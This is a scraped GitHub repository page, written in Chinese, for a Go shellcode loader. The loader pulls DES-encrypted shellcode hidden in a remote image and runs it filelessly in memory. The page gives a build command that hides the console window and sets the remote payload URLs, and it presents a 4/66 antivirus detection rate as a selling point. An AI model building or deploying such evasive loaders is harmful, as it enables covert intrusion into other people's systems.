TryGOTry / go-shellcode-webimg-load

golang shellcode loader 远程图片隐写加载执行 无文件落地

Home Page:http://www.nctry.com

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

图片隐写的远程shellcode加载器,无文件落地版本

采用des加密,所以需要des加密的shellcode网址,和des的key(将隐写的图片放入web服务器)

vt查杀率:4/66 avatar 微步 avatar

如何编译

 go build -ldflags "-w -H=windowsgui -X main.deskey=deskey的网址 -X main.descode=descode的网址"

关于shellcode加密

相关项目 直接加密64位的raw格式的payload即可

关于图片隐写

在线生成 图片隐写项目:https://github.com/auyer/steganography

关于作者

一个菜鸟. 个人博客

2021.03.10

About

golang shellcode loader 远程图片隐写加载执行 无文件落地

http://www.nctry.com


Languages

Language:Go 100.0%